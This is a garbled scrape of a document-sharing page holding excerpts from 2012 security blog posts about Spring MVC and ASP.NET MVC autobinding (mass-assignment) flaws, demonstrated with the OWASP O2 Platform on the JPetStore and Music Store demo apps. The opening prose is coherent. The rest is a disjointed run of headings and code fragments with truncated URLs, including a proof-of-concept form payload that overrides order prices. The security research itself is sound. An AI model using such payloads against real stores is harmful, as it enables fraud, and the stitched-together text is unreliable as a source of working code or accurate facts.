is not needed (if there is enough energy and supporters willing to buy 20k Summit tickets )
April 2012
104
Why ASP.NET MVC is insecure by design , just like Spring MVC

(and why SAST can help)
In the recent Secure coding (and Application Security) must be invisible to developers post Joshbw posted this
great comment on the reasons why we end up with insecure by default Frameworks
On top of that the frameworks are being developed with the same mindset of all of the other products out
there - What makes the customer happy first, and then maybe if security doesnt interfere with that. A great
example is that MVCs really should employ declaritive binding rather than auto binding; **it really
is a marginal hit to development and ensures that the only fields that can be set are those explicitely
exposed by the dev. **Despite this problem being known for years even MS has taken the stance that
devs should opt into declaritive binding despite the fact that MVCs are default allow.
In a way Microsofts (and Springs) decision to chose the insecure default (see Spring MVC Autobinding
Vulnerability) is probably the correct business decision.
Choosing the secure alternative, would introduce a hit to development (Joshbw thinks this would be marginal,
but Im not so sure), which these Framework developers felt could create a bad user experience (their users
are the developers) and could potentially drive away users into other frameworks that had such by default
AutoBinding features.
This is why I say that We need Security-focused SAST/Static-Analysis rules so that we can deal with the cases
where AutoBinding creates vulnerabilities.
In fact, a good example of security adding value to developers would be if those SAST rules (via an security
engine) would actually automatically introduce those Declarative Bindings without requiring a developers
intervention (this could happen behind the scenes , invisible to a developer, unless that was creating business
impact (i.e. side-effect).
To see an example of what this could look like, take a look at The future of secure code? Fixing/Encoding
.NET code in real time (in this case Response.Write)
On the commercial SAST front, as far as I know, only Armorize ventures into this code fixing territory
April 2012
105

Using the Tool - O2 Cmd SpringMVC v1.0.exe (see more details on this post: Tool - O2 Cmd SpringMVC
v1.0.exe - as standalone exe) here is how to start using it on ThreadFix from Denim Group (ThreadFix is a
software vulnerability aggregation and management system that helps organizations aggregate vulnerability
data, generate virtual patches, and interact with software defect tracking systems.)
I downloaded the ThreadFix binaries from the download page : [ThreadFix101.zip](http://code.google.com/p/threadfix/download

And since I couldnt find a download for the source code, I used git by executing:_ $ git clone https://code.google.com/p/thread
Then I unzipped the [ThreadFix101.zip](http://code.google.com/p/threadfix/downloads/detail?name=ThreadFix101.zip&can=2&

files into a local folder and executed threadfix.bat
This will start tomcat, and more importantly extract the threadfix.war file into the webapps folder, where I
zipped the classes folder:
April 2012
106
which I then dropped into the O2 Spring MVC tool:
The first time there is a source code to be opened in the document viewer area, you will be asked to resolve
the files, which in this case it points to here:
April 2012
107
Interestingly there is quite a lot meat here. For example, if you look for the ModelAttribute mappings there
is quite a lot cases where they use this dangerous coding technique:
With some of the model classes looking quite big, there could be a number of spring mvc autobinding issues
here:
April 2012
108

Exploiting MVC

Transféré par

Informations du document

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

Exploiting MVC

Transféré par

Droits d'auteur :

Formats disponibles

Exploiting MVC Model Binding

O2 Script with BlackBox exploits for Spring MVC AutoBinding

var topPanel = "JPetStore 'AutoBinding Vulnerability' PoC".popupWindow(1000,700);

nerHtml().notNull() && element.innerHtml().contains("Total:")).first();

O2 Script for Spring MVC JPetStore - Start Servers (start/stop

O2 Script: Spring MVC Util - View Controllers

Creating an API for JPetStore Browser automation

Injecting FirebugLite and jQuery into a IE Automation page

is a screenshot what what this looks like:

Writing an O2 IE Automation Script for JPetStore Account

Viewing JPetStore Hsqldb database and couple more Autobinding

use jdbc:hsqldb:hsql://localhost:9002 as the URL value):

Here is a sample query:

Here are a couple more Autobinding issues

//var _payload = "order.totalPrice=1111&" + "order.lineItems[0].unitPrice=12"; // works

var jPetStore = new API_JPetStore(ie);

Finding the JSP views that are mapped to controlers in JPetStore

Which is the fact that the view seems to

in JPetStore?. A first look looks that is common

Which is confirmed when looking at the other ModelAndView constructors:

the call to the ModelAndView constructor):

Visualizing the links in JPetStore (Spring MVC)

its link data:

Packaged Spring MVC Security Test Apps: JPetStore and PetClinc

Simple Viewer to see JSP files (example using Spring MVC

mode).h2 script and looks like this:

(note the need to map the include files)

filter and the textbox on the right is a regex text search)

Visualizing Spring MVC Annotations based Controls (and

For the rest

Unzip the files to the C:O2Demos folder

which will trigger the conversion process:

Note that in order for the

to drive/test the website dynamically

In fact, in this case, there are infinite posibilites, since: the

example of spring mvc controllers

Fixing one of JPetStores AutoBinding Vulnerabilities (changing

minumal code changes on the controllers

protected Object formBackingObject(HttpServletRequest request) throws ModelAndViewDefiningException

(boolean shippingAddressRequired) { this.orderForm.setShippingAddressRequired(shippingAddressRequired);

ASP.NET MVC MUSIC STORE

HTTP form post fields using Fiddler

Exploiting Microsoft MVC vulnerabilities using OWASP O2

ASP.NET MVC MUSIC STORE[/caption]

ie.field(Phone).value(Phone); ie.field(PostalCode).value(PostalCode); ie.field(PromoCode).value(PromoCode);

[caption id=attachment1568 align=alignnone width=1024]

id=attachment1565 align=alignnone width=1024]

Using ASP.NET MVC 4.0 in TeamMentor (with simple Controller,

UPDATE: Azure required a couple more MVC dependencies

We can also access the same page on http://localhost:3187/MvcTest/FirstAction

And open the other controller method at http://localhost:3187/MvcTest/SecondAction

Can you spot the security implications/vulnerability of a small

protected void Application_Start()

public class CartModelBinder : DefaultModelBinder

protected override object CreateModel(ControllerContext controllerContext, ModelBindingContext bindingContext, Type modelType)

public class Cart

public RedirectToRouteResult AddToCart(Cart cart, int productId, string returnUrl)

public class CartModelBinder : IModelBinder

public object BindModel(ControllerContext controllerContext,ModelBindingContext bindingContext)

From this blog

Exploiting Microsoft MVC vulnerabilities using OWASP O2 Platform

Nice business logic vulnerability and CSRF on the ASP.NET MVC

. and here is the 2nd order:

spot any probs so far?